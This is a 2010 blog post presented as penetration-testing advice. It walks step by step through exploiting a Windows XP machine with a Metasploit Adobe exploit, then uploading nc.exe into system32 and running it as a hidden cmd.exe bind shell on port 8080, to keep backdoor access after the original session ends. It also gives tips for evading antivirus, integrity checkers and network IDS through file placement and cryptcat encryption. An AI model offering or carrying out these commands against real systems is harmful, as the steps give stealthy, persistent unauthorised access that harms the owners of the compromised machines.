Welcome to the SecurityisFutile blog

I welcome comments and suggestions, I take criticism very lightly (at least most of the time). My goal for this blog is to document various experiments and research projects I feel are both relevant and prominent in the field of computer security (or lack there of) and share my results and experiences with other fellow computer security enthusiests. Most of my topics are based soley on open source technology and methodology, mostly due to availability and cost. I believe that effective security measures help keep people honest with their technology, for the most part. Security is futile (usless) or at least it feels that way when an inspired opportunist comes around and exploits your weaknesses. With that being said I leave you with a quote of inspiration; There is no security on this earth, there is only opportunity.-- General Douglas MacArthur

Friday, May 28, 2010

Netcat is a useful security/networking tool that has been around since the dawn of the dinosaurs. However, it still holds credibility amongst security professionals even today, probably due to its inherent features and versatile design that make it an effective "swiss army knife" for most computer enthusiasts. Penetration tests some times require the security professional to maintain access to the compromised target even when he looses the original avenue of attack. A network IPS, Firewall, Virus detection defense mechanism could trip after the fact, like when trying to implant a Trojan or Virus as your backdoor. This could cause your Metasploit meterpreter shell to loose connection with its session/target and even create a new policy to block your IP address. After working so hard to get the client side attack to exploit you wouldn't want all of your hard work to go in vein.

Using netcat (or cryptcat) to pop command shells from the compromised target to alternate ports/IP addresses is still an effective way of staying under the radar and maintaining access to the compromised target. For instance, not all anti-virus software will detect the presence of the nc.exe program. Its not to say you couldn't do all of this with Metasploit or some other tool but its cool to use alternative methods and change it up sometimes ;-)

Pop a shell on a windows target using the client-side Metasploit Universal Adobe exploit

Upload "nc.exe" to a safe location (maybe some place where a virus scanner wouldn't be running and an integrity checking tool wouldn't be monitoring) on the compromised target and start a netcat/cryptcat listener running the "cmd.exe" command on a common port

On the attack system, use netcat to connect to the listening port on the compromised system...bam...instant command shell (if you use cryptcat you will have encryption to help evade a network IDS)

Perform as many times as necessary, but not too much! Remain stealth!

Steps (Modify as necessary. This is just a guide):

On the attack image launch the metasploit 3.x command console

command: msfconsole

Use the Adobe Acrobat universal exploit. You can search for it in msfconsole

command: search adobe command: use exploit name

You should now be using the exploit name. Set the options for the payload/exploit

On your Windows XP target, open a browser window and put in the http://ipaddress/adobe/urlstringto launch the exploit(Adobe should attempt to run the document and hang)

On your attack system see if the exploit ran successfully

command: sessions -inumber

(Metasploit will tell you if the exploit was successful and if a session was created with the compromised system. If not...try again or try another exploit/avenue of attack...)

If all went well you should now be in your new session.

Now use the meterpreter shell to upload the nc.exe program to the compromised system

Copy the nc.exe file to the attack system installdirectory/Framework3/msf3 directory. This is where you rmeterpreter shell will attempt to grab the nc.exe program from when you use the upload function

Now run the upload command in the meterpreter shell to upload nc.exe to the target's system32 directory

command: upload -r nc.exe

Now use meterpreter to execute the nc.exe file and run as a service in the background

command: execute -f "nc.exe -L -p 8080 -d -e cmd.exe" (The process should be created on the compromised system)

Use netcat on your attack image to connect to the port hosting the command shell (cmd.exe)

command: nc -v -ntargetip 8080

Now you should have another remote back door. Connect as many times as you want and open up as many shells as you need. Then Close out of your meterpreter session, close metasploit.....look....you still have a shell :-)